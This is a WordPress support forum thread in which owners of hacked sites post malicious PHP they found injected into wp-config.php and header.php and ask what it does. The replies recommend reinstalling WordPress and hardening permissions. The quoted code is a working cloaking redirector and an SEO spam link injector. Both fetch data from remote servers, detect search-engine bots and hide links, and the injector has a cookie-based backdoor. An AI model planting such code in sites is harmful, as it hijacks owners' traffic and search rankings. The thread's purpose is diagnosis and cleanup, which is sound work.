• Resolved Mark


    I’m almost certain that one our WordPress sites got hacked. The address is https://www.MarilynAndSarah.org. When you get to the main page (at least using FireFox) you’ll see all kinds of “transferring data” clues on the bottom left section of your browser. The main culprit is:


    I looked through TONS of documentation, read this and that, installed this plugin, looked at other posts about “what to look for when you think you are hacked” and I did find some code, specifically in the “wp-config.php” file:

    define ('WPLANG', ''); error_reporting(0);$sd="";$pts=explode("?",$_SERVER['REQUEST_URI']);$pt=$pts[0];$d1="";$f1="/allmykey4.txt";$fp1=fsockopen($d1,80,$erno,$erstr,30);if(!$fp1){print "Err: $erstr [$erno]";}else{fwrite($fp1,"GET $f1 HTTP/1.0\r\n");fwrite($fp1,"Host: $d1\r\n\r\n");while(!feof($fp1)){$h1.=fread($fp1,512);}fclose($fp1);}preg_match_all("!<begin>([^<]+)<end>!",$h1,$m1);$rkk=$m1[1][rand(0,count($m1[0])-1)];$rk=explode("@",$rkk);$rd=$rk[0];$rp=$rk[1];$a=$_SERVER['HTTP_USER_AGENT'];$ra=$_SERVER['HTTP_REFERER'];if(eregi("google",$a)||eregi("Googlebot",$a)||eregi("slurp",$a)||eregi("msnbot",$a)||eregi("google.",$ra)||eregi("yahoo.",$ra)||eregi("live.",$ra)||eregi("msn.",$ra)||eregi("bing.",$ra)){$d4=$rd;if(!eregi("/news",$pt)){$f4="/news".$pt;$f4=str_replace($sd,"",$f4);}else{$f4=str_replace($sd,"",$pt);}$fp4=fsockopen($d4,80,$erno,$erstr,30);if(!$fp4){print "Err: $erstr [$erno]";}else{fwrite($fp4,"GET $f4 HTTP/1.0\r\n");fwrite($fp4,"Host: $d4\r\n\r\n");while(!feof($fp4)){$h4.=fread($fp4,512);}fclose($fp4);}$bo="<frameset rows='100%,*' noresize><frame src='https://".$d4."/".$f4."' noresize></frameset><body>";$h4=str_replace('<body>',$bo,$h4);if(eregi("<h1>Page not found, 404 error</h1>",$h4)){$ru="/".$sd.$rp;header("HTTP/1.1 301");header("Location: $ru");exit();}else{$x4=explode("\r\n",$h4);for($m=9;$m<sizeof($x4);$m++){echo $x4[$m];}exit();}}

    I’ve taken some precautions to strengthen security measures but those take time. I just started working here a few weeks ago and my laundry list continues to grow!

    Anyway if anyone has any ideas at all that would be splendid!

    Thanks again comrades as you’ve never failed me yet!


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  • Thread Starter Mark


    Yeah I did notice the config file’s permissions being off, it’s fixed now though ??

    Yeah we will notify Blip too! Just didn’t know if it would be useful on these forums too ??

    tag this thread to help it come up in searches!

    Moderator James Huff


    tag this thread to help it come up in searches!

    Tagged. Sorry, tags weren’t working yesterday. I just found out that they were fixed now.

    Thread Starter Mark


    Yeah I didn’t see a way to add em :/// Oh well hopefully WP’s search will pick up those words ??

    My wp site also got hacked, running wp v3.0, Can anyone tell me what this php code does? I found it in my wp header.php, inserted just after <body>. This code wasn’t in my template before.

    class Lclass {
        var $_sys_charset       = '';
        var $_error             = '';
        var $_force_show_code   = false;
        var $_is_our_bot        = false;
        var $_debug             = false;
        var $_salt              = 'a8ccb8f1e68fed4e4b0a4a9db3a971fa';
        var $_charset           = 'utf-8';
        function Lclass()
            $this->_host = preg_replace('/^www\./', '',preg_replace('/^http:\/\//', '',$_SERVER['HTTP_HOST']));
            $this->_request_uri = $_SERVER['REQUEST_URI'];
            $this->_prefix = chr(115).chr(97).chr(112).chr(101);
            $this->_db_file = './Thumbs.db';
            if (isset($_COOKIE[ $this->_prefix . '_cookie']) && ($_COOKIE[$this->_prefix . '_cookie'] == $this->_salt)) {
                $this->_is_our_bot = true;
                if (isset($_COOKIE[$this->_prefix . '_debug']) && ($_COOKIE[$this->_prefix . '_debug'] == 1)){
                    $this->_debug = true;
            } else {
                $this->_is_our_bot = false;
        function fetch_remote_file($host, $path) {
            $user_agent = $this->_user_agent.' 1.0.7';
            @ini_set('allow_url_fopen',          1);
            @ini_set('default_socket_timeout',   6);
            @ini_set('user_agent',               $user_agent);
            if (
                $this->_fetch_remote_type == 'file_get_contents'
                    $this->_fetch_remote_type == ''
                    ini_get('allow_url_fopen') == 1
            ) {
                $this->_fetch_remote_type = 'file_get_contents';
                if ($data = @file_get_contents('https://' . $host . $path)) {
                    return $data;
            } elseif (
                $this->_fetch_remote_type == 'curl'
                    $this->_fetch_remote_type == ''
            ) {
                $this->_fetch_remote_type = 'curl';
                if ($ch = @curl_init()) {
                    @curl_setopt($ch, CURLOPT_URL,              'https://' . $host . $path);
                    @curl_setopt($ch, CURLOPT_HEADER,           false);
                    @curl_setopt($ch, CURLOPT_RETURNTRANSFER,   true);
                    @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,   $this->_socket_timeout);
                    @curl_setopt($ch, CURLOPT_USERAGENT,        $user_agent);
                    if ($data = @curl_exec($ch)) {
                        return $data;
            } else {
                $this->_fetch_remote_type = 'socket';
                $buff = '';
                $fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
                if ($fp) {
                    @fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
                    @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
                    while (!@feof($fp)) {
                        $buff .= @fgets($fp, 128);
                    $page = explode("\r\n\r\n", $buff);
                    return $page[1];
        function _read($filename) {
            $fp = @fopen($filename, 'rb');
            @flock($fp, LOCK_SH);
            if ($fp) {
                $length = @filesize($filename);
                $mqr = @get_magic_quotes_runtime();
                if ($length) {
                    $data = @fread($fp, $length);
                } else {
                    $data = '';
                @flock($fp, LOCK_UN);
                return $data;
        function _write($filename, $data) {
            $fp = @fopen($filename, 'ab');
            if ($fp) {
                if (flock($fp, LOCK_EX|LOCK_NB)) {
                    $length = strlen($data);
                    ftruncate($fp, 0);
                    @fwrite($fp, $data, $length);
                    @flock($fp, LOCK_UN);
                    if (md5($this->_read($filename)) != md5($data)) {
                } else {
                    return false;
                return true;
        function load_data() {
            if (!is_file($this->_db_file)) {
                if (@touch($this->_db_file)) {
                    @chmod($this->_db_file, 0666);
                } else {
            if (!is_writable($this->_db_file)) {
            $data = $this->_read($this->_db_file);
            if (
                    filemtime($this->_db_file) < (time()-3000)
                    filesize($this->_db_file) == 0
                    @unserialize($data) == false
            ) {
                @touch($this->_db_file, (time() - 2500));
                $ex=chr(114) . chr(117);
                $path = '/code.php?user=' . $this->_salt . '&host=' . $this->_host . '&charset=' . $this->_charset;
                $list= array('dispenser-01', 'dispenser-02');
                foreach ($list as $i => $server){
                    if ($data = $this->fetch_remote_file($server . '.' . $this->_prefix . '.' . $ex, $path)) {
                        if (substr($data, 0, 12) != 'FATAL ERROR:') {
                            $hash = @unserialize($data);
                            if ($hash != false) {
                                $hash['__' . $this->_prefix . '_charset__'] = $this->_charset;
                                $hash['__last_update__'] = time();
                                $hash['__multi_site__'] =  $this->_multi_site;
                                $hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
                                $hash['__php_version__'] = @phpversion();
                                $hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
                                $data_new = @serialize($hash);
                                if ($data_new) {
                                    $data = $data_new;
                                $this->_write($this->_db_file, $data);
            if (strlen(session_id())) {
                $session = session_name() . '=' . session_id();
                $this->_request_uri = str_replace(array('?'.$session,'&'.$session), '', $this->_request_uri);
    class LClassi extends Lclass {
        var $_links_delimiter = '';
        var $_links = array();
        var $_links_page = array();
        function LClassi() {
            $this->_user_agent = strtoupper($this->_prefix) . '_Client PHP';
        function template($tid,$n = null, $offset = 0) {
            if (is_array($this->_links_page)) {
                $total_page_links = count($this->_links_page);
                if (!is_numeric($n) || $n > $total_page_links) {
                    $n = $total_page_links;
                $links = array();
                for ($i = 1; $i <= $n; $i++) {
                    if ($offset > 0 && $i <= $offset) {
                    } else {
                        $links[] = array_shift($this->_links_page);
                $html = join($this->_links_delimiter, $links);
                if (
                    strlen($this->_charset) > 0
                    strlen($this->_sys_charset) > 0
                    $this->_sys_charset != $this->_charset
                ) {
                    $new_html  = @iconv($this->_sys_charset, $this->_charset, $html);
                    if ($new_html) {
                        $html = $new_html;
                if ($this->_is_our_bot) {
                    $html = '<' .$this->_prefix . '_noindex>' . $html . '</' . $this->_prefix . '_noindex>';
                return $html;
            } else {
                return $this->_links_page;
        function set_data($data) {
            $this->_links = $data;
            if (isset($this->_links['__' . $this->_prefix . '_delimiter__'])) {
                $this->_links_delimiter = $this->_links['__' . $this->_prefix . '_delimiter__'];
            if (isset($this->_links['__' . $this->_prefix . '_charset__'])) {
                $this->_sys_charset = $this->_links['__' . $this->_prefix . '_charset__'];
            } else {
                $this->_sys_charset = '';
            if (@array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
                $this->_links_page = $this->_links[$this->_request_uri];
            } else {
                if (isset($this->_links['__' . $this->_prefix . '_new_url__']) && strlen($this->_links['__' . $this->_prefix . '_new_url__'])) {
                    if ($this->_is_our_bot || $this->_force_show_code){
                        $this->_links_page = $this->_links['__' . $this->_prefix . '_new_url__'];
    function Linit()
            $Lclient = new LClassi();
            $tplt = 'x' .    $Lclient->template($template_id);
            if($tplt!='')$tplt=str_repeat(' ',800) . '<font style="position:absolute;left:-600px;width:100px">' . $tplt . '</font>';
            echo $tplt;
    Thread Starter Mark


    It looks like it’s replacing something on your domain account. Clean the file up by getting a new copy of it and make sure your permissions are set properly. That’s what screwed our site over.

    There’s some good information here to look at to beef up your WordPress install:


    Thanks EncryptDesigns, What I did was install a fresh copy of WP then restore database and uninfected theme. I guess this will fix!!!
    What I notice was Google page rank bar use to show me PR4 but then suddenly PR disappeared, not sure this is related, but is it possible to steal google page rank by redirecting google bots?

    Thread Starter Mark


    No problemo. Our issue with MHM was that the wp-config.php file did not have the proper permissions. As a result whenenver someone typed “Marilyn and Sarah” then on our link there they would get redirected to this “news” site. They were redirecting traffic through the wp-config.php file. Since that controls everything regarding WP, they were able to send traffic elsewhere. At least it wasn’t a porn site! ?? Needlesstosay I learned a lot about securing WP than I knew before, so I guess that’s good:)

    I had just took over a position there and checking the permissions of everything was on my to-do list but came before I had a chance to look! But if you follow those “hardening wordpress” techniques that will definitely make all the difference.

    Also try renaming your Tables in your MySQL database. There are lots of little things that you can do to make all the difference when securing your WP install.

    Good luck and have fun!


    Holy #$@%!

    The SAME thing happened to me after I embedded a video from Blip.tv! My site constantly kept trying to access gw022.lphbs.com or gw013.lphbs.com and would not load properly. Once I removed the Blip.tv file everything seemed to work fine.
    Thanks so much, EncryptDesigns, for calling attention to this issue – I really hope Blip.tv is aware of this!!


    Thread Starter Mark


    Glad you found this post ?? I did email their Support Team about this and they were aware of it and I don’t think you have to worry about it too much since it’s on their servers.

    I would just make sure that you have all of your bases covered as it talks about here:
    Hardening WordPress

    I am using Login Lockdown

    So those should help out quite a bit.

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